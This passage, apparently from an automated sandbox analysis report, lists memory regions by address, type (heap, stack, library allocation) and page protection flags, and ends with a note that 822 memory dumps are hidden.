page read and write
|
||
|
7CD000
|
heap
|
page read and write
|
||
|
F95000
|
heap
|
page read and write
|
||
|
1460000
|
trusted library allocation
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
33E1000
|
heap
|
page read and write
|
||
|
106A000
|
heap
|
page read and write
|
||
|
145B000
|
heap
|
page read and write
|
||
|
FD0000
|
heap
|
page read and write
|
||
|
B0E000
|
stack
|
page read and write
|
||
|
5CA0000
|
heap
|
page read and write
|
||
|
9FC000
|
stack
|
page read and write
|
||
|
D53000
|
heap
|
page read and write
|
||
|
3A6000
|
unkown
|
page readonly
|
||
|
16B0000
|
heap
|
page read and write
|
||
|
380000
|
unkown
|
page readonly
|
||
|
583E000
|
stack
|
page read and write
|
||
|
57E000
|
stack
|
page read and write
|
||
|
DD0000
|
heap
|
page read and write
|
||
|
56F9000
|
stack
|
page read and write
|
||
|
10AF000
|
heap
|
page read and write
|
||
|
75BC000
|
stack
|
page read and write
|
||
|
1472000
|
trusted library allocation
|
page read and write
|
||
|
10D3000
|
heap
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
33C2000
|
heap
|
page read and write
|
||
|
3B9000
|
unkown
|
page readonly
|
||
|
3881000
|
heap
|
page read and write
|
||
|
DFC000
|
heap
|
page read and write
|
||
|
7C7000
|
heap
|
page read and write
|
||
|
7A9000
|
heap
|
page read and write
|
||
|
2710000
|
heap
|
page read and write
|
||
|
D42000
|
heap
|
page read and write
|
||
|
29FE000
|
unkown
|
page read and write
|
||
|
D58000
|
heap
|
page read and write
|
||
|
304D000
|
heap
|
page read and write
|
||
|
F84000
|
heap
|
page read and write
|
||
|
3051000
|
heap
|
page read and write
|
||
|
D8F192A000
|
stack
|
page read and write
|
||
|
306A000
|
heap
|
page read and write
|
||
|
30F0000
|
heap
|
page read and write
|
||
|
BA0000
|
heap
|
page read and write
|
||
|
33DD000
|
heap
|
page read and write
|
||
|
124D000
|
heap
|
page read and write
|
||
|
71EB000
|
stack
|
page read and write
|
||
|
461000
|
unkown
|
page read and write
|
||
|
E14000
|
heap
|
page read and write
|
||
|
D53000
|
heap
|
page read and write
|
||
|
27F485BF000
|
heap
|
page read and write
|
||
|
303F000
|
stack
|
page read and write
|
||
|
1060000
|
trusted library allocation
|
page read and write
|
||
|
7AD000
|
heap
|
page read and write
|
||
|
D42000
|
heap
|
page read and write
|
||
|
1060000
|
trusted library allocation
|
page read and write
|
||
|
14DE000
|
stack
|
page read and write
|
||
|
E14000
|
heap
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
1440000
|
trusted library allocation
|
page read and write
|
||
|
640000
|
heap
|
page read and write
|
||
|
1028000
|
heap
|
page read and write
|
||
|
E74000
|
heap
|
page read and write
|
||
|
7B1000
|
heap
|
page read and write
|
||
|
7C7000
|
heap
|
page read and write
|
||
|
4F4000
|
unkown
|
page readonly
|
||
|
3458000
|
heap
|
page read and write
|
||
|
27F4A3B0000
|
heap
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
5240000
|
heap
|
page read and write
|
||
|
D64000
|
heap
|
page read and write
|
||
|
7B1000
|
heap
|
page read and write
|
||
|
7BE000
|
heap
|
page read and write
|
||
|
1590000
|
trusted library allocation
|
page read and write
|
||
|
1477000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E5E000
|
stack
|
page read and write
|
||
|
99F000
|
stack
|
page read and write
|
||
|
F06000
|
heap
|
page read and write
|
||
|
2FC8000
|
heap
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
30C0000
|
heap
|
page read and write
|
||
|
EF5000
|
heap
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
E28000
|
heap
|
page read and write
|
||
|
E43000
|
heap
|
page read and write
|
||
|
E14000
|
heap
|
page read and write
|
||
|
33E4000
|
heap
|
page read and write
|
||
|
D3D000
|
heap
|
page read and write
|
||
|
1392000
|
heap
|
page read and write
|
||
|
107D000
|
heap
|
page read and write
|
||
|
D92000
|
heap
|
page read and write
|
||
|
5B3E000
|
stack
|
page read and write
|
||
|
2D40000
|
heap
|
page read and write
|
||
|
DBB000
|
heap
|
page read and write
|
||
|
22D5000
|
heap
|
page read and write
|
||
|
F00000
|
unkown
|
page read and write
|
||
|
2827000
|
heap
|
page read and write
|
||
|
E8D000
|
heap
|
page read and write
|
||
|
D8F23FE000
|
stack
|
page read and write
|
||
|
2FB0000
|
heap
|
page read and write
|
||
|
3CD4000
|
trusted library allocation
|
page read and write
|
||
|
3FC1000
|
trusted library allocation
|
page read and write
|
||
|
380000
|
unkown
|
page readonly
|
||
|
F09000
|
unkown
|
page readonly
|
||
|
3072000
|
trusted library allocation
|
page read and write
|
||
|
33EA000
|
heap
|
page read and write
|
||
|
D62000
|
heap
|
page read and write
|
||
|
F63000
|
heap
|
page read and write
|
||
|
F2A000
|
heap
|
page read and write
|
||
|
16E6000
|
heap
|
page read and write
|
||
|
742D000
|
stack
|
page read and write
|
||
|
7BE000
|
heap
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
D94000
|
heap
|
page read and write
|
||
|
33E4000
|
heap
|
page read and write
|
||
|
281F000
|
stack
|
page read and write
|
||
|
28DD000
|
heap
|
page read and write
|
||
|
6AFE000
|
stack
|
page read and write
|
||
|
E41000
|
heap
|
page read and write
|
||
|
2CFD000
|
stack
|
page read and write
|
||
|
33E0000
|
heap
|
page read and write
|
||
|
107C000
|
heap
|
page read and write
|
||
|
D37000
|
heap
|
page read and write
|
||
|
D18000
|
heap
|
page read and write
|
||
|
D92000
|
heap
|
page read and write
|
||
|
3260000
|
heap
|
page read and write
|
||
|
DA2000
|
heap
|
page read and write
|
||
|
7AD000
|
heap
|
page read and write
|
||
|
27F485B6000
|
heap
|
page read and write
|
||
|
279F000
|
stack
|
page read and write
|
||
|
2F1000
|
unkown
|
page execute read
|
||
|
FB0000
|
heap
|
page read and write
|
||
|
14A3000
|
heap
|
page read and write
|
||
|
70EE000
|
stack
|
page read and write
|
||
|
4DCF000
|
stack
|
page read and write
|
||
|
1590000
|
trusted library allocation
|
page read and write
|
||
|
51BF000
|
stack
|
page read and write
|
||
|
2BF8000
|
heap
|
page read and write
|
||
|
5490000
|
trusted library allocation
|
page read and write
|
||
|
DB0000
|
heap
|
page read and write
|
||
|
54D0000
|
trusted library allocation
|
page read and write
|
||
|
22C0000
|
heap
|
page read and write
|
||
|
DE2000
|
heap
|
page read and write
|
||
|
3FAE000
|
stack
|
page read and write
|
||
|
1060000
|
trusted library allocation
|
page read and write
|
||
|
1061000
|
heap
|
page read and write
|
||
|
560000
|
heap
|
page read and write
|
||
|
F06000
|
heap
|
page read and write
|
||
|
27F485EC000
|
heap
|
page read and write
|
||
|
F2A000
|
heap
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
E09000
|
heap
|
page read and write
|
||
|
E99000
|
heap
|
page read and write
|
||
|
E40000
|
unkown
|
page readonly
|
||
|
FE2000
|
heap
|
page read and write
|
||
|
800000
|
heap
|
page read and write
|
||
|
1590000
|
trusted library allocation
|
page read and write
|
||
|
E73000
|
heap
|
page read and write
|
||
|
27F485EC000
|
heap
|
page read and write
|
||
|
DC2000
|
heap
|
page read and write
|
||
|
305C000
|
stack
|
page read and write
|
||
|
13B1000
|
heap
|
page read and write
|
||
|
223E000
|
stack
|
page read and write
|
||
|
7A8E000
|
stack
|
page read and write
|
||
|
BA4000
|
heap
|
page read and write
|
||
|
7C7000
|
heap
|
page read and write
|
||
|
FC8000
|
heap
|
page read and write
|
||
|
54B6000
|
trusted library allocation
|
page read and write
|
||
|
D8F1DFF000
|
stack
|
page read and write
|
||
|
33EA000
|
heap
|
page read and write
|
||
|
E14000
|
heap
|
page read and write
|
||
|
27F48905000
|
heap
|
page read and write
|
||
|
5B7D000
|
stack
|
page read and write
|
||
|
10B5000
|
heap
|
page read and write
|
||
|
D62000
|
heap
|
page read and write
|
||
|
DDE000
|
heap
|
page read and write
|
||
|
64E0000
|
heap
|
page read and write
|
||
|
1050000
|
heap
|
page read and write
|
||
|
2FC1000
|
trusted library allocation
|
page read and write
|
||
|
F62000
|
heap
|
page read and write
|
||
|
F21000
|
heap
|
page read and write
|
||
|
D8F22FF000
|
stack
|
page read and write
|
||
|
7CF000
|
heap
|
page read and write
|
||
|
798E000
|
stack
|
page read and write
|
||
|
D53000
|
heap
|
page read and write
|
||
|
27F485E7000
|
heap
|
page read and write
|
||
|
D37000
|
heap
|
page read and write
|
||
|
307D000
|
trusted library allocation
|
page read and write
|
||
|
E69000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
2AA000
|
stack
|
page read and write
|
||
|
CFB000
|
stack
|
page read and write
|
||
|
E04000
|
heap
|
page read and write
|
||
|
F92000
|
heap
|
page read and write
|
||
|
F20000
|
trusted library allocation
|
page read and write
|
||
|
E14000
|
heap
|
page read and write
|
||
|
10AF000
|
heap
|
page read and write
|
||
|
7B1000
|
heap
|
page read and write
|
||
|
D10000
|
heap
|
page read and write
|
||
|
B6E000
|
stack
|
page read and write
|
||
|
107B000
|
heap
|
page read and write
|
||
|
5500000
|
trusted library allocation
|
page execute and read and write
|
||
|
FDE000
|
heap
|
page read and write
|
||
|
FC5000
|
heap
|
page read and write
|
||
|
FD9000
|
heap
|
page read and write
|
||
|
76C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
14F0000
|
heap
|
page execute and read and write
|
||
|
1060000
|
trusted library allocation
|
page read and write
|
||
|
EC1000
|
heap
|
page read and write
|
||
|
137F000
|
heap
|
page read and write
|
||
|
12CF000
|
stack
|
page read and write
|
||
|
2826000
|
heap
|
page read and write
|
||
|
27F48520000
|
heap
|
page read and write
|
||
|
304D000
|
heap
|
page read and write
|
||
|
F92000
|
heap
|
page read and write
|
||
|
27F485B6000
|
heap
|
page read and write
|
||
|
3060000
|
heap
|
page read and write
|
||
|
6510000
|
trusted library allocation
|
page read and write
|
||
|
111B000
|
heap
|
page read and write
|
||
|
3066000
|
trusted library allocation
|
page read and write
|
||
|
1060000
|
trusted library allocation
|
page read and write
|
||
|
5710000
|
heap
|
page read and write
|
||
|
EEE000
|
heap
|
page read and write
|
||
|
3098000
|
trusted library allocation
|
page read and write
|
||
|
6827000
|
heap
|
page read and write
|
||
|
27F484F0000
|
heap
|
page read and write
|
||
|
FA0000
|
heap
|
page read and write
|
||
|
1060000
|
trusted library allocation
|
page read and write
|
||
|
DA2000
|
heap
|
page read and write
|
||
|
BA4000
|
heap
|
page read and write
|
||
|
3FE9000
|
trusted library allocation
|
page read and write
|
||
|
304F000
|
heap
|
page read and write
|
||
|
DDE000
|
heap
|
page read and write
|
||
|
F4A000
|
heap
|
page read and write
|
||
|
E14000
|
heap
|
page read and write
|
||
|
29B0000
|
heap
|
page read and write
|
||
|
3BE8000
|
trusted library allocation
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
D37000
|
heap
|
page read and write
|
||
|
32D0000
|
heap
|
page read and write
|
||
|
1590000
|
trusted library allocation
|
page read and write
|
||
|
1150000
|
heap
|
page read and write
|
||
|
D8F24FE000
|
stack
|
page read and write
|
||
|
1061000
|
heap
|
page read and write
|
||
|
E60000
|
heap
|
page read and write
|
||
|
1590000
|
trusted library allocation
|
page read and write
|
||
|
F92000
|
heap
|
page read and write
|
||
|
EDE000
|
heap
|
page read and write
|
||
|
726E000
|
stack
|
page read and write
|
||
|
79A000
|
heap
|
page read and write
|
||
|
1590000
|
trusted library allocation
|
page read and write
|
||
|
33EA000
|
heap
|
page read and write
|
||
|
2240000
|
heap
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
ECC000
|
heap
|
page read and write
|
||
|
33E2000
|
heap
|
page read and write
|
||
|
BFE000
|
heap
|
page read and write
|
||
|
2F3F000
|
stack
|
page read and write
|
||
|
27F485EC000
|
heap
|
page read and write
|
||
|
2FBE000
|
stack
|
page read and write
|
||
|
308E000
|
trusted library allocation
|
page read and write
|
||
|
27F485BE000
|
heap
|
page read and write
|
||
|
732E000
|
stack
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
DDD000
|
heap
|
page read and write
|
||
|
13A4000
|
heap
|
page read and write
|
||
|
E14000
|
heap
|
page read and write
|
||
|
E8B000
|
heap
|
page read and write
|
||
|
FBC000
|
heap
|
page read and write
|
||
|
DDE000
|
heap
|
page read and write
|
||
|
E11000
|
heap
|
page read and write
|
||
|
27F485EA000
|
heap
|
page read and write
|
||
|
1060000
|
trusted library allocation
|
page read and write
|
||
|
7F990000
|
trusted library allocation
|
page execute and read and write
|
||
|
11C8000
|
heap
|
page read and write
|
||
|
33EA000
|
heap
|
page read and write
|
||
|
F08000
|
heap
|
page read and write
|
||
|
33EA000
|
heap
|
page read and write
|
||
|
27F4A010000
|
heap
|
page read and write
|
||
|
7CD000
|
heap
|
page read and write
|
||
|
27F485E2000
|
heap
|
page read and write
|
||
|
33A0000
|
heap
|
page read and write
|
||
|
72EF000
|
stack
|
page read and write
|
||
|
1060000
|
trusted library allocation
|
page read and write
|
||
|
33DC000
|
heap
|
page read and write
|
||
|
1510000
|
heap
|
page read and write
|
||
|
153A000
|
trusted library allocation
|
page read and write
|
||
|
33BF000
|
heap
|
page read and write
|
||
|
64DD000
|
stack
|
page read and write
|
||
|
EA8000
|
heap
|
page read and write
|
||
|
D9E000
|
heap
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
D9B000
|
heap
|
page read and write
|
||
|
4E60000
|
heap
|
page read and write
|
||
|
549B000
|
trusted library allocation
|
page read and write
|
||
|
549E000
|
trusted library allocation
|
page read and write
|
||
|
54F0000
|
trusted library allocation
|
page read and write
|
||
|
1060000
|
trusted library allocation
|
page read and write
|
||
|
784E000
|
stack
|
page read and write
|
||
|
34DF000
|
stack
|
page read and write
|
||
|
1453000
|
trusted library allocation
|
page read and write
|
||
|
30E1000
|
heap
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
27F485DE000
|
heap
|
page read and write
|
||
|
54B1000
|
trusted library allocation
|
page read and write
|
||
|
27F48588000
|
heap
|
page read and write
|
||
|
307C000
|
heap
|
page read and write
|
||
|
33D9000
|
heap
|
page read and write
|
||
|
E5A000
|
heap
|
page read and write
|
||
|
27F485B6000
|
heap
|
page read and write
|
||
|
3221000
|
heap
|
page read and write
|
||
|
F20000
|
trusted library allocation
|
page read and write
|
||
|
361C000
|
stack
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
E41000
|
unkown
|
page execute read
|
||
|
3B4000
|
unkown
|
page write copy
|
||
|
C5E000
|
unkown
|
page readonly
|
||
|
7B1000
|
heap
|
page read and write
|
||
|
800000
|
heap
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
2ED0000
|
heap
|
page read and write
|
||
|
7BE000
|
heap
|
page read and write
|
||
|
DD0000
|
heap
|
page read and write
|
||
|
7A8000
|
heap
|
page read and write
|
||
|
2244000
|
heap
|
page read and write
|
||
|
D8D000
|
heap
|
page read and write
|
||
|
DC0000
|
trusted library allocation
|
page read and write
|
||
|
DF1000
|
heap
|
page read and write
|
||
|
7C7000
|
heap
|
page read and write
|
||
|
33E5000
|
heap
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
1470000
|
trusted library allocation
|
page read and write
|
||
|
7A8000
|
heap
|
page read and write
|
||
|
305B000
|
trusted library allocation
|
page read and write
|
||
|
40B000
|
unkown
|
page write copy
|
||
|
3881000
|
heap
|
page read and write
|
||
|
33B8000
|
heap
|
page read and write
|
||
|
1670000
|
heap
|
page read and write
|
||
|
D36000
|
heap
|
page read and write
|
||
|
662C000
|
stack
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
6C3E000
|
stack
|
page read and write
|
||
|
27F485EC000
|
heap
|
page read and write
|
||
|
30E5000
|
heap
|
page read and write
|
||
|
54BD000
|
trusted library allocation
|
page read and write
|
||
|
DE0000
|
heap
|
page read and write
|
||
|
6520000
|
heap
|
page read and write
|
||
|
D39000
|
heap
|
page read and write
|
||
|
F6F000
|
heap
|
page read and write
|
||
|
33EB000
|
heap
|
page read and write
|
||
|
D33000
|
heap
|
page read and write
|
||
|
F1D000
|
heap
|
page read and write
|
||
|
7A8000
|
heap
|
page read and write
|
||
|
700C000
|
stack
|
page read and write
|
||
|
D54000
|
heap
|
page read and write
|
||
|
4E4F000
|
stack
|
page read and write
|
||
|
5494000
|
trusted library allocation
|
page read and write
|
||
|
4D8E000
|
stack
|
page read and write
|
||
|
1314000
|
heap
|
page read and write
|
||
|
FB0000
|
heap
|
page read and write
|
||
|
E14000
|
heap
|
page read and write
|
||
|
770E000
|
stack
|
page read and write
|
||
|
BA4000
|
heap
|
page read and write
|
||
|
1590000
|
trusted library allocation
|
page read and write
|
||
|
E04000
|
heap
|
page read and write
|
||
|
304B000
|
trusted library allocation
|
page read and write
|
||
|
75F000
|
stack
|
page read and write
|
||
|
12FD000
|
heap
|
page read and write
|
||
|
DA3000
|
heap
|
page read and write
|
||
|
305C000
|
heap
|
page read and write
|
||
|
3B33000
|
trusted library allocation
|
page read and write
|
||
|
101F000
|
heap
|
page read and write
|
||
|
DFD000
|
heap
|
page read and write
|
||
|
30CC000
|
heap
|
page read and write
|
||
|
D8F20FE000
|
stack
|
page read and write
|
||
|
27F485EC000
|
heap
|
page read and write
|
||
|
308A000
|
trusted library allocation
|
page read and write
|
||
|
ED9000
|
heap
|
page read and write
|
||
|
146A000
|
trusted library allocation
|
page execute and read and write
|
||
|
F6E000
|
heap
|
page read and write
|
||
|
4BC000
|
stack
|
page read and write
|
||
|
DDE000
|
heap
|
page read and write
|
||
|
BA4000
|
heap
|
page read and write
|
||
|
B10000
|
heap
|
page read and write
|
||
|
3073000
|
heap
|
page read and write
|
||
|
27F4890C000
|
heap
|
page read and write
|
||
|
3221000
|
heap
|
page read and write
|
||
|
27F485E5000
|
heap
|
page read and write
|
||
|
1067000
|
heap
|
page read and write
|
||
|
22B0000
|
heap
|
page read and write
|
There are 822 hidden memdumps, click here to show them.